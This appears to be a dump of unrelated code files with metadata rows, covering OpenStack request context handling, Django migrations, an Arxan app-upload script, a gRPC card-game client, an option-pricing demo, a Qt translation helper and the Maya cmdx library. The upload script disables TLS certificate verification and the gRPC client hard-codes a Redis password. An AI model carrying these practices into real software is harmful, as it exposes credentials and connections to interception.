| benchmark/startQiskit843.py | 3,926 | qubit number=5 total number=40 implement the oracle O_f^\pm NOTE: use U1 gate (P gate) with \lambda = 180 ==> CZ gate or multi_control_Z_gate (issue 127) oracle.h(controls[n]) oracle.barrier() circuit begin number=3 number=4 number=5 number=6 number=30 number=36 number=37 number=38 number=34 number=35 number=32 number=21 number=1 number=2 number=7 number=39 number=8 number=9 number=10 number=22 number=23 number=24 number=25 number=26 number=27 number=29 number=13 number=14 number=15 number=16 number=17 number=18 number=19 number=20 circuit end | 549 | en | 0.220307 |
# Copyright 2011 OpenStack Foundation
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""RequestContext: context for requests that persist through all of patron."""
import copy
from keystoneclient import auth
from keystoneclient import service_catalog
from oslo_context import context
from oslo_log import log as logging
from oslo_utils import timeutils
import six
from patron import exception
from patron.i18n import _, _LW
from patron import policy
LOG = logging.getLogger(__name__)
class _ContextAuthPlugin(auth.BaseAuthPlugin):
    """A keystoneclient auth plugin that uses the values from the Context.
    Ideally we would use the plugin provided by auth_token middleware however
    this plugin isn't serialized yet so we construct one from the serialized
    auth data.
    """
    def __init__(self, auth_token, sc):
        """Wrap an already-issued token and a raw service catalog.

        :param auth_token: pre-authenticated token to hand back verbatim
        :param sc: serialized service catalog (list of endpoint entries)
        """
        super(_ContextAuthPlugin, self).__init__()
        self.auth_token = auth_token
        # ServiceCatalogV2 expects the list nested under 'serviceCatalog'.
        sc = {'serviceCatalog': sc}
        self.service_catalog = service_catalog.ServiceCatalogV2(sc)
    def get_token(self, *args, **kwargs):
        # The token was issued elsewhere; simply return it.
        return self.auth_token
    def get_endpoint(self, session, service_type=None, interface=None,
                     region_name=None, service_name=None, **kwargs):
        # Resolve an endpoint URL from the stored catalog.
        return self.service_catalog.url_for(service_type=service_type,
                                            service_name=service_name,
                                            endpoint_type=interface,
                                            region_name=region_name)
class RequestContext(context.RequestContext):
"""Security context and request information.
Represents the user taking a given action within the system.
"""
def __init__(self, user_id=None, project_id=None,
is_admin=None, read_deleted="no",
roles=None, remote_address=None, timestamp=None,
request_id=None, auth_token=None, overwrite=True,
quota_class=None, user_name=None, project_name=None,
service_catalog=None, instance_lock_checked=False,
user_auth_plugin=None, **kwargs):
""":param read_deleted: 'no' indicates deleted records are hidden,
'yes' indicates deleted records are visible,
'only' indicates that *only* deleted records are visible.
:param overwrite: Set to False to ensure that the greenthread local
copy of the index is not overwritten.
:param user_auth_plugin: The auth plugin for the current request's
authentication data.
:param kwargs: Extra arguments that might be present, but we ignore
because they possibly came in from older rpc messages.
"""
user = kwargs.pop('user', None)
tenant = kwargs.pop('tenant', None)
super(RequestContext, self).__init__(
auth_token=auth_token,
user=user_id or user,
tenant=project_id or tenant,
domain=kwargs.pop('domain', None),
user_domain=kwargs.pop('user_domain', None),
project_domain=kwargs.pop('project_domain', None),
is_admin=is_admin,
read_only=kwargs.pop('read_only', False),
show_deleted=kwargs.pop('show_deleted', False),
request_id=request_id,
resource_uuid=kwargs.pop('resource_uuid', None),
overwrite=overwrite)
# oslo_context's RequestContext.to_dict() generates this field, we can
# safely ignore this as we don't use it.
kwargs.pop('user_identity', None)
if kwargs:
LOG.warning(_LW('Arguments dropped when creating context: %s') %
str(kwargs))
# FIXME(dims): user_id and project_id duplicate information that is
# already present in the oslo_context's RequestContext. We need to
# get rid of them.
self.user_id = user_id
self.project_id = project_id
self.roles = roles or []
self.read_deleted = read_deleted
self.remote_address = remote_address
if not timestamp:
timestamp = timeutils.utcnow()
if isinstance(timestamp, six.string_types):
timestamp = timeutils.parse_strtime(timestamp)
self.timestamp = timestamp
if service_catalog:
# Only include required parts of service_catalog
self.service_catalog = [s for s in service_catalog
if s.get('type') in ('volume', 'volumev2', 'key-manager')]
else:
# if list is empty or none
self.service_catalog = []
self.instance_lock_checked = instance_lock_checked
# NOTE(markmc): this attribute is currently only used by the
# rs_limits turnstile pre-processor.
# See https://lists.launchpad.net/openstack/msg12200.html
self.quota_class = quota_class
self.user_name = user_name
self.project_name = project_name
self.is_admin = is_admin
self.user_auth_plugin = user_auth_plugin
if self.is_admin is None:
self.is_admin = policy.check_is_admin(self)
def get_auth_plugin(self):
    """Return the auth plugin for this context's authentication data.

    Prefers the plugin captured from the incoming request; otherwise
    builds a _ContextAuthPlugin from the serialized token and
    service catalog.
    """
    plugin = self.user_auth_plugin
    if plugin:
        return plugin
    return _ContextAuthPlugin(self.auth_token, self.service_catalog)
def _get_read_deleted(self):
    # Getter: current deleted-record visibility mode.
    return self._read_deleted

def _set_read_deleted(self, read_deleted):
    # Setter: only the three supported modes are accepted.
    if read_deleted in ('no', 'yes', 'only'):
        self._read_deleted = read_deleted
    else:
        raise ValueError(_("read_deleted can only be one of 'no', "
                           "'yes' or 'only', not %r") % read_deleted)

def _del_read_deleted(self):
    # Deleter: drop the backing attribute entirely.
    del self._read_deleted

# Expose the validated accessor trio as a single property.
read_deleted = property(fget=_get_read_deleted,
                        fset=_set_read_deleted,
                        fdel=_del_read_deleted)
def to_dict(self):
    """Serialize the context, adding the patron-specific fields.

    The defensive getattr() defaults are kept on purpose (see the
    FIXME in the original code about unexplained stack traces from
    partially-initialised contexts).
    """
    values = super(RequestContext, self).to_dict()

    # Straight attribute copies, each with its defensive default.
    for attr, default in (('user_id', None),
                          ('project_id', None),
                          ('is_admin', None),
                          ('read_deleted', 'no'),
                          ('roles', None),
                          ('remote_address', None),
                          ('request_id', None),
                          ('quota_class', None),
                          ('user_name', None),
                          ('service_catalog', None),
                          ('project_name', None),
                          ('instance_lock_checked', False)):
        values[attr] = getattr(self, attr, default)

    # Timestamp needs string formatting, so handle it separately.
    if hasattr(self, 'timestamp'):
        values['timestamp'] = timeutils.strtime(self.timestamp)
    else:
        values['timestamp'] = None

    return values
@classmethod
def from_dict(cls, values):
    """Rebuild a context from the dict produced by to_dict()."""
    return cls(**values)
def elevated(self, read_deleted=None, overwrite=False):
    """Return a deep copy of this context with the admin flag set.

    :param read_deleted: optionally override the copy's read_deleted
        mode ('no', 'yes' or 'only').
    :param overwrite: unused; kept for signature compatibility.
    """
    admin_ctx = copy.deepcopy(self)
    admin_ctx.is_admin = True

    roles = admin_ctx.roles
    if 'admin' not in roles:
        roles.append('admin')

    if read_deleted is not None:
        admin_ctx.read_deleted = read_deleted

    return admin_ctx
def __str__(self):
    # Render as the fully serialized dict, e.g. "<Context {'user_id': ...}>".
    return "<Context %s>" % self.to_dict()
def get_admin_context(read_deleted="no"):
    """Create an administrator context with no associated user/project."""
    admin_kwargs = {
        'user_id': None,
        'project_id': None,
        'is_admin': True,
        'read_deleted': read_deleted,
        'overwrite': False,
    }
    return RequestContext(**admin_kwargs)
def is_user_context(context):
    """Indicate whether the request context is a normal (non-admin) user."""
    # No context, or an admin context, is not a user context.
    if not context or context.is_admin:
        return False
    # A real user context carries both a user and a project.
    return bool(context.user_id and context.project_id)
def require_admin_context(ctxt):
    """Raise exception.AdminRequired() if context is not an admin context.

    (Docstring fix: the previous docstring said the opposite of what
    the code does -- it raises for NON-admin contexts.)
    """
    if not ctxt.is_admin:
        raise exception.AdminRequired()
def require_context(ctxt):
    """Raise exception.Forbidden() if context is neither a user nor an
    admin context.
    """
    if not (ctxt.is_admin or is_user_context(ctxt)):
        raise exception.Forbidden()
def authorize_project_context(context, project_id):
    """Ensures a request has permission to access the given project."""
    if not is_user_context(context):
        # Admin contexts are implicitly authorized.
        return
    if not context.project_id or context.project_id != project_id:
        raise exception.Forbidden()
def authorize_user_context(context, user_id):
    """Ensures a request has permission to access the given user."""
    if not is_user_context(context):
        # Admin contexts are implicitly authorized.
        return
    if not context.user_id or context.user_id != user_id:
        raise exception.Forbidden()
def authorize_quota_class_context(context, class_name):
    """Ensures a request has permission to access the given quota class."""
    if not is_user_context(context):
        # Admin contexts are implicitly authorized.
        return
    if not context.quota_class or context.quota_class != class_name:
        raise exception.Forbidden()
| patron/context.py | 10,195 | Security context and request information.
Represents the user taking a given action within the system.
A keystoneclient auth plugin that uses the values from the Context.
Ideally we would use the plugin provided by auth_token middleware however
this plugin isn't serialized yet so we construct one from the serialized
auth data.
:param read_deleted: 'no' indicates deleted records are hidden,
'yes' indicates deleted records are visible,
'only' indicates that *only* deleted records are visible.
:param overwrite: Set to False to ensure that the greenthread local
copy of the index is not overwritten.
:param user_auth_plugin: The auth plugin for the current request's
authentication data.
:param kwargs: Extra arguments that might be present, but we ignore
because they possibly came in from older rpc messages.
Ensures a request has permission to access the given project.
Ensures a request has permission to access the given quota class.
Ensures a request has permission to access the given user.
Return a version of this context with admin flag set.
Indicates if the request context is a normal user.
Raise exception.AdminRequired() if context is not an admin context.
Raise exception.Forbidden() if context is not a user or an
admin context.
RequestContext: context for requests that persist through all of patron.
Copyright 2011 OpenStack Foundation Copyright 2010 United States Government as represented by the Administrator of the National Aeronautics and Space Administration. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. oslo_context's RequestContext.to_dict() generates this field, we can safely ignore this as we don't use it. FIXME(dims): user_id and project_id duplicate information that is already present in the oslo_context's RequestContext. We need to get rid of them. Only include required parts of service_catalog if list is empty or none NOTE(markmc): this attribute is currently only used by the rs_limits turnstile pre-processor. See https://lists.launchpad.net/openstack/msg12200.html FIXME(dims): defensive hasattr() checks need to be removed once we figure out why we are seeing stack traces | 2,671 | en | 0.863667 |
# Generated by Django 3.2.5 on 2021-11-29 19:04
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated (Django 3.2.5) migration for the schools app.

    Redefines School.courses_offered as an optional (blank=True)
    many-to-many field to organisations.Course whose reverse accessor
    and reverse query name are both "schools".
    """

    dependencies = [
        ("organisations", "0004_auto_20210718_1147"),
        ("schools", "0005_alter_school_courses_offered"),
    ]

    operations = [
        migrations.AlterField(
            model_name="school",
            name="courses_offered",
            field=models.ManyToManyField(
                blank=True,
                related_name="schools",
                related_query_name="schools",
                to="organisations.Course",
                verbose_name="courses",
            ),
        ),
    ]
| pucadmin/schools/migrations/0006_alter_school_courses_offered.py | 662 | Generated by Django 3.2.5 on 2021-11-29 19:04 | 45 | en | 0.719168 |
# Generated by Django 3.0 on 2020-10-19 06:30
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated (Django 3.0) migration for the accounts app.

    Re-declares UserProfile's primary key as a plain auto-created
    AutoField named "id" (not serialized).
    """

    dependencies = [
        ('accounts', '0003_auto_20200922_1738'),
    ]

    operations = [
        migrations.AlterField(
            model_name='userprofile',
            name='id',
            field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
        ),
    ]
| accounts/migrations/0004_auto_20201019_1200.py | 444 | Generated by Django 3.0 on 2020-10-19 06:30 | 43 | en | 0.718975 |
#
# Copyright 2021 XEBIALABS
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
import json
import requests
import org.slf4j.LoggerFactory as LoggerFactory

logger = LoggerFactory.getLogger("Arxan")

# Upload an application binary to the Arxan aPaaS protection service and
# expose the resulting protection id through `output`.
#
# Runs under Jython inside XL Deploy/Release: `server`, `file_path`,
# `auth_string`, `output` and `AuthorizationError` are injected into
# scope by the host -- they are not defined in this file.

# New ARXAN logic
# setup the request url
api_token_endpoint = "/v2/apaas/apps"
url = server.get('url') + "%s" % api_token_endpoint

with open(file_path, 'rb') as app_file:
    logger.info('Filepath: %s' % file_path)
    files = {'appFile': app_file}
    # Only the Authorization header is needed here: `requests` generates
    # the multipart Content-Type (with boundary) itself.  A previous,
    # immediately-overwritten urlencoded Content-Type header was removed.
    headers = {
        'Authorization': auth_string,
    }
    data = {
        'productId': 'Essential Protection',
        'protection': {
            'appAware': {
                'applicationToken': server.get('app_token'),
                'endpoint': server.get('app_endpoint')
            }
        }
    }
    logger.info('Uploading file...')
    logger.info('URL: %s' % url)
    logger.info('Headers: %s' % json.dumps(headers))
    logger.info('JSON: %s' % json.dumps(data))
    # NOTE(review): verify=False disables TLS certificate validation --
    # confirm whether the Arxan endpoint really requires this.
    response = requests.post(url, files=files,
                             data={'data': json.dumps(data)},
                             headers=headers, verify=False)

    logger.info('Uploading app response status code: %s.' % response.status_code)
    logger.info(response.json()['message'])

    if response.status_code == 200:
        logger.info('App uploaded')
        json_response = response.json()
        logger.debug('App upload response: %s', json_response)
        if 'protectionId' not in json_response:
            logger.error('There was a problem uploading the app. Missing protectionId in the response')
        else:
            protection_id = json_response['protectionId']
            logger.debug('App protection id is %s', protection_id)
            output = protection_id
    elif response.status_code == 400:
        error_message = response.json()['message']
        logger.error('There was a problem protecting %s', error_message)
    elif response.status_code == 401 or response.status_code == 403:
        raise AuthorizationError()
    elif response.status_code == 404:
        logger.error('Cannot reach server %s', server)
    else:
        logger.error('An unexpected error has occurred. (%d)', response.status_code)
        # BUG FIX: %-format the message; previously the status code was
        # passed as a stray second Exception argument and never formatted.
        raise Exception('Incorrect response code for upload app: (%s)'
                        % response.status_code)
# Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The Python implementation of the GRPC helloworld.Greeter client."""
from __future__ import print_function
import logging
from urllib import response
from vinte_um import Jogador, VinteUm
import grpc
import helloworld_pb2
import helloworld_pb2_grpc
import time
import redis
def createLoginForm(stub):
    """Prompt for credentials on stdin, cache the username in Redis and
    perform the gRPC Login call.

    :param stub: helloworld GreeterStub bound to the game server.
    :returns: the server's LoginReply (carries cards and auth token).
    """
    username = input("Digite seu login: ")
    password = input("Digite sua senha: ")
    # NOTE(review): hard-coded localhost Redis credentials -- acceptable
    # for a classroom demo, but should come from configuration otherwise.
    _redis = redis.Redis(
        host= 'localhost',
        port= '6379',
        password = 'davi')
    # Round-trip the username through Redis (set then read back).
    _redis.set('username', username)
    value = _redis.get('username')
    print("variavel do redis:", value)
    return stub.Login(helloworld_pb2.LoginRequest(username=username, password=password))
def runTurn(stub, auth_token):
    """Ask the player whether to draw another card ("S"/"N") and relay
    the answer to the server as a TurnAction request.
    """
    extraCard = input("Deseja cavar mais uma carta? S/N: ")
    return stub.TurnAction(helloworld_pb2.TurnRequest(auth_token=auth_token, dig = extraCard))
def run():
    """Drive one full interactive game session against the server."""
    # NOTE(gRPC Python Team): .close() is possible on a channel and should be
    # used in circumstances in which the with statement does not fit the needs
    # of the code.
    with grpc.insecure_channel('0.0.0.0:50051') as channel:
        stub = helloworld_pb2_grpc.GreeterStub(channel)
        login = createLoginForm(stub)
        print("Suas cartas são: ", login.message)
        # Keep taking turns until the server reports we stopped playing.
        while True:
            turnResponse = runTurn(stub, login.auth_token)
            print("Suas cartas são: ", turnResponse.cards)
            if turnResponse.message:
                print(turnResponse.message)
            if turnResponse.playing == "False":
                break
        # Once our turn loop ends, ask the server for the result.
        winner = stub.VerifyTurn(helloworld_pb2.VerifyTurnRequest(auth_token=login.auth_token))
        print(winner.message)
if __name__ == '__main__':
    # Configure default logging before starting the interactive client.
    logging.basicConfig()
    run()
| examples/python/helloworld/greeter_client.py | 2,421 | The Python implementation of the GRPC helloworld.Greeter client.
Copyright 2015 gRPC authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. NOTE(gRPC Python Team): .close() is possible on a channel and should be used in circumstances in which the with statement does not fit the needs of the code. | 775 | en | 0.865565 |
__author__ = 'Randall'

from demos.setup import np, plt, demo
from compecon import DDPmodel

# DEMDDP04 Binomial American put option model
# Values an American put via a discrete dynamic program (DDPmodel with
# horizon N) over a binomial price lattice, then plots the optimal
# exercise boundary and the option premium.

# Model Parameters
T = 0.5                    # years to expiration
sigma = 0.2                # annual volatility
r = 0.05                   # annual interest rate
strike = 2.1               # option strike price
p0 = 2.0                   # current asset price

# Discretization Parameters
N = 100                    # number of time intervals
tau = T / N                # length of time intervals
delta = np.exp(-r * tau)   # discount factor
u = np.exp(sigma * np.sqrt(tau))  # up jump factor
q = 0.5 + np.sqrt(tau) * (r - (sigma**2) / 2) / (2 * sigma)  # up jump probability

# State Space: lattice of prices reachable in N up/down steps from p0.
price = p0 * u ** np.arange(-N, N+1)  # asset prices
n = price.size                        # number of states

# Action Space (hold=1, exercise=2)
X = ['hold', 'exercise']   # vector of actions
m = len(X)                 # number of actions

# Reward Function: exercising pays the intrinsic value, holding pays 0.
f = np.zeros((m, n))
f[1] = strike - price

# State Transition Probability Matrix: under "hold" the price moves one
# lattice step up with probability q, down with 1 - q (clamped at edges).
P = np.zeros((m, n, n))
for i in range(n):
    P[0, i, min(i + 1, n - 1)] = q
    P[0, i, max(i - 1, 0)] = 1 - q

# Model Structure
model = DDPmodel(f, P, delta, horizon=N)
model.solve()

## Analysis

# Plot Optimal Exercise Boundary (where the optimal policy switches).
i, j = np.where(np.diff(model.policy[:-1], 1))
temp = (i * tau)[::-1]
demo.figure('Put Option Optimal Exercise Boundary', 'Time to Maturity', 'Asset Price')
plt.plot(temp, price[j])

# Plot Option Premium vs. Asset Price (dashed line = intrinsic value).
demo.figure('Put Option Value', 'Asset Price', 'Premium', [0, 2 * strike])
plt.plot([0, strike], [strike, 0], 'k--', lw=2)
plt.plot(price, model.value[0], lw=3)
plt.show()
#!/usr/bin/env python
# Helpful little script that spits out a comma-separated list of
# language codes for Qt icons that should be included
# in binary Astercoin Core distributions

import glob
import os
import re
import sys

if len(sys.argv) != 3:
    sys.exit("Usage: %s $QTDIR/translations $BITCOINDIR/src/qt/locale" % sys.argv[0])

d1 = sys.argv[1]  # Qt's own translations directory
d2 = sys.argv[2]  # Astercoin's Qt locale directory

# Locale codes for which Qt ships a translation (qt_XX.qm) and for which
# Astercoin ships one (astercoin_XX.qm); only the intersection matters.
l1 = set([re.search(r'qt_(.*).qm', f).group(1) for f in glob.glob(os.path.join(d1, 'qt_*.qm'))])
l2 = set([re.search(r'astercoin_(.*).qm', f).group(1) for f in glob.glob(os.path.join(d2, 'astercoin_*.qm'))])

# BUG FIX: the bare Python 2 `print` statement is a SyntaxError on
# Python 3; print() emits the same string on both.
print(",".join(sorted(l1.intersection(l2))))
| contrib/qt_translations.py | 627 | !/usr/bin/env python Helpful little script that spits out a comma-separated list of language codes for Qt icons that should be included in binary Astercoin Core distributions | 174 | en | 0.830021 |
# -*- coding: utf-8 -*-
import os
import sys
import json
import time
import math
import types
import logging
import traceback
import operator
import collections
from functools import wraps
from maya import cmds
from maya.api import OpenMaya as om, OpenMayaAnim as oma, OpenMayaUI as omui
from maya import OpenMaya as om1, OpenMayaMPx as ompx1, OpenMayaUI as omui1
__version__ = "0.4.6"

PY3 = sys.version_info[0] == 3

# Bypass assertion error on unsupported Maya versions
IGNORE_VERSION = bool(os.getenv("CMDX_IGNORE_VERSION"))

# Output profiling information to console
# CAREFUL! This will flood your console. Use sparingly.
TIMINGS = bool(os.getenv("CMDX_TIMINGS"))

# Do not perform any caching of nodes or plugs
SAFE_MODE = bool(os.getenv("CMDX_SAFE_MODE"))

# Increase performance by not protecting against
# fatal crashes (e.g. operations on deleted nodes)
# This can be useful when you know for certain that a
# series of operations will happen in isolation, such
# as during an auto rigging build or export process.
ROGUE_MODE = not SAFE_MODE and bool(os.getenv("CMDX_ROGUE_MODE"))

# Increase performance by not bothering to free up unused memory
MEMORY_HOG_MODE = not SAFE_MODE and bool(os.getenv("CMDX_MEMORY_HOG_MODE"))

ENABLE_PEP8 = True

# Support undo/redo
ENABLE_UNDO = not SAFE_MODE

# Required
ENABLE_PLUG_REUSE = True

if PY3:
    string_types = str,
else:
    # Only evaluated under Python 2, where these names exist.
    string_types = str, basestring, unicode

try:
    __maya_version__ = int(cmds.about(version=True))
except (AttributeError, ValueError):
    __maya_version__ = 2015  # E.g. Preview Release 95

if not IGNORE_VERSION:
    assert __maya_version__ >= 2015, "Requires Maya 2015 or newer"

# The module object itself, so runtime statistics can live on it.
self = sys.modules[__name__]
self.installed = False

log = logging.getLogger("cmdx")

# Aliases - API 1.0
om1 = om1
omui1 = omui1

# Aliases - API 2.0
om = om
oma = oma
omui = omui

# Accessible via `cmdx.NodeReuseCount` etc.
Stats = self
Stats.NodeInitCount = 0
Stats.NodeReuseCount = 0
Stats.PlugReuseCount = 0
Stats.LastTiming = None

# Node reuse depends on this member
if not hasattr(om, "MObjectHandle"):
    log.warning("Node reuse might not work in this version of Maya "
                "(OpenMaya.MObjectHandle not found)")

TimeUnit = om.MTime.uiUnit()

# DEPRECATED
MTime = om.MTime
MDistance = om.MDistance
MAngle = om.MAngle

TimeType = om.MTime
DistanceType = om.MDistance
AngleType = om.MAngle

ExistError = type("ExistError", (RuntimeError,), {})
DoNothing = None

# Reusable objects, for performance
GlobalDagNode = om.MFnDagNode()
GlobalDependencyNode = om.MFnDependencyNode()

First = 0
Last = -1

# Animation curve interpolation, from MFnAnimCurve::TangentType
Stepped = 5
Linear = 2
Smooth = 4

history = dict()
class ModifierError(RuntimeError):
    """Raised when a deferred modifier fails.

    Carries the list of attempted (cmd, args, kwargs) tasks as
    `self.history` and renders them into the error message.
    """

    def __init__(self, history):
        # Render each recorded task as "cmd(arg1, arg2, ...)".
        rendered = [
            "%s(%s)" % (cmd, ", ".join(repr(arg) for arg in args))
            for cmd, args, kwargs in history
        ]
        message = (
            "An unexpected internal failure occurred, "
            "these tasks were attempted:\n- " +
            "\n- ".join(rendered)
        )
        self.history = history
        super(ModifierError, self).__init__(message)
def withTiming(text="{func}() {time:.2f} ns"):
    """Append timing information to a function

    The measured duration is in microseconds, despite the "ns" in the
    default label (kept as-is for backward compatibility).

    Example:
        @withTiming()
        def function():
            pass

    """
    # BUG FIX: time.clock() was removed in Python 3.8; prefer
    # perf_counter when it exists (3.3+) and fall back to clock on
    # Python 2 (Maya 2015+), keeping both interpreters working.
    clock = getattr(time, "perf_counter", None) or time.clock

    def timings_decorator(func):
        if not TIMINGS:
            # Do not wrap the function.
            # This yields zero cost to runtime performance
            return func

        @wraps(func)
        def func_wrapper(*args, **kwargs):
            t0 = clock()

            try:
                return func(*args, **kwargs)
            finally:
                t1 = clock()
                duration = (t1 - t0) * 10 ** 6  # microseconds

                Stats.LastTiming = duration

                log.debug(
                    text.format(func=func.__name__,
                                time=duration)
                )

        return func_wrapper

    return timings_decorator
def protected(func):
    """Prevent fatal crashes from illegal access to deleted nodes"""
    if ROGUE_MODE:
        # Rogue mode trades this safety for speed: return the bare function.
        return func

    @wraps(func)
    def func_wrapper(*args, **kwargs):
        node = args[0]
        if node._destroyed:
            raise ExistError("Cannot perform operation on deleted node")
        return func(*args, **kwargs)

    return func_wrapper
def add_metaclass(metaclass):
    """Add metaclass to Python 2 and 3 class

    Helper decorator, from six.py

    """
    def wrapper(cls):
        # Rebuild the class body, dropping slot descriptors and the
        # implicit __dict__/__weakref__ entries so the metaclass can
        # recreate them cleanly.
        body = dict(cls.__dict__)
        slots = body.get('__slots__')
        if slots is not None:
            slot_names = [slots] if isinstance(slots, str) else slots
            for slot in slot_names:
                body.pop(slot)
        body.pop('__dict__', None)
        body.pop('__weakref__', None)
        if hasattr(cls, '__qualname__'):
            body['__qualname__'] = cls.__qualname__
        return metaclass(cls.__name__, cls.__bases__, body)
    return wrapper
class _Type(int):
    """Facilitate use of isinstance(space, _Type)"""


MFn = om.MFn

# MFn function-set constants, wrapped so they are recognisable by type.
kDagNode = _Type(om.MFn.kDagNode)
kShape = _Type(om.MFn.kShape)
kTransform = _Type(om.MFn.kTransform)
kJoint = _Type(om.MFn.kJoint)
kSet = _Type(om.MFn.kSet)


class _Space(int):
    """Facilitate use of isinstance(space, _Space)"""


# Spaces
sWorld = _Space(om.MSpace.kWorld)
sObject = _Space(om.MSpace.kObject)
sTransform = _Space(om.MSpace.kTransform)
sPostTransform = _Space(om.MSpace.kPostTransform)
sPreTransform = _Space(om.MSpace.kPreTransform)

# Euler rotation orders, aliased from om.MEulerRotation.
kXYZ = om.MEulerRotation.kXYZ
kYZX = om.MEulerRotation.kYZX
kZXY = om.MEulerRotation.kZXY
kXZY = om.MEulerRotation.kXZY
kYXZ = om.MEulerRotation.kYXZ
kZYX = om.MEulerRotation.kZYX
class _Unit(int):
    """A Maya unit, for unit-attributes such as Angle and Distance

    Because the resulting classes are subclasses of `int`, there
    is virtually no run-time performance penalty to using it as
    an integer. No additional Python is called, most notably when
    passing the integer class to the Maya C++ binding (which wouldn't
    call our overridden methods anyway).

    The added overhead to import time is negligible.

    """

    def __new__(cls, unit, enum):
        self = super(_Unit, cls).__new__(cls, enum)
        self._unit = unit
        return self

    def __call__(self, enum):
        # Wrap a raw value in this unit, e.g. Degrees(90).
        return self._unit(enum, self)


# Angular units
Degrees = _Unit(om.MAngle, om.MAngle.kDegrees)
Radians = _Unit(om.MAngle, om.MAngle.kRadians)
AngularMinutes = _Unit(om.MAngle, om.MAngle.kAngMinutes)
AngularSeconds = _Unit(om.MAngle, om.MAngle.kAngSeconds)

# Distance units
Millimeters = _Unit(om.MDistance, om.MDistance.kMillimeters)
Centimeters = _Unit(om.MDistance, om.MDistance.kCentimeters)
Meters = _Unit(om.MDistance, om.MDistance.kMeters)
Kilometers = _Unit(om.MDistance, om.MDistance.kKilometers)
Inches = _Unit(om.MDistance, om.MDistance.kInches)
Feet = _Unit(om.MDistance, om.MDistance.kFeet)
Miles = _Unit(om.MDistance, om.MDistance.kMiles)
Yards = _Unit(om.MDistance, om.MDistance.kYards)

# Time units
Milliseconds = _Unit(om.MTime, om.MTime.kMilliseconds)
Minutes = _Unit(om.MTime, om.MTime.kMinutes)
Seconds = _Unit(om.MTime, om.MTime.kSeconds)


def UiUnit():
    """Unlike other time units, this can be modified by the user at run-time"""
    return _Unit(om.MTime, om.MTime.uiUnit())


_Cached = type("Cached", (object,), {})  # For isinstance(x, _Cached)
Cached = _Cached()

# Per-node scratch storage, keyed on the node's hex hash code.
_data = collections.defaultdict(dict)
class Singleton(type):
    """Re-use previous instances of Node

    Cost: 14 microseconds

    This enables persistent state of each node, even when
    a node is discovered at a later time, such as via
    :func:`DagNode.parent()` or :func:`DagNode.descendents()`

    Arguments:
        mobject (MObject): Maya API object to wrap
        exists (bool, optional): Whether or not to search for
            an existing Python instance of this node

    Example:
        >>> nodeA = createNode("transform", name="myNode")
        >>> nodeB = createNode("transform", parent=nodeA)
        >>> encode("|myNode") is nodeA
        True
        >>> nodeB.parent() is nodeA
        True

    """

    # Shared cache: hex hash code -> live Node instance.
    _instances = {}

    @withTiming()
    def __call__(cls, mobject, exists=True, modifier=None):
        # Key the cache on the MObject's hash code, formatted as hex.
        handle = om.MObjectHandle(mobject)
        hsh = handle.hashCode()
        hx = "%x" % hsh

        if exists and handle.isValid():
            try:
                node = cls._instances[hx]
                # A destroyed node must never be served from the cache.
                assert not node._destroyed
            except (KeyError, AssertionError):
                pass
            else:
                Stats.NodeReuseCount += 1
                # Re-discovering a node implies it is back in the scene.
                node._removed = False
                return node

        # It didn't exist, let's create one
        # But first, make sure we instantiate the right type
        # NOTE: DagNode/ObjectSet/AnimCurve are defined later in this module.
        if mobject.hasFn(om.MFn.kDagNode):
            sup = DagNode
        elif mobject.hasFn(om.MFn.kSet):
            sup = ObjectSet
        elif mobject.hasFn(om.MFn.kAnimCurve):
            sup = AnimCurve
        else:
            sup = Node

        self = super(Singleton, sup).__call__(mobject, exists, modifier)
        self._hashCode = hsh
        self._hexStr = hx
        cls._instances[hx] = self

        return self
@add_metaclass(Singleton)
class Node(object):
    """A Maya dependency node

    Example:
        >>> _ = cmds.file(new=True, force=True)
        >>> decompose = createNode("decomposeMatrix", name="decompose")
        >>> str(decompose)
        'decompose'
        >>> alias = encode(decompose.name())
        >>> decompose == alias
        True
        >>> transform = createNode("transform")
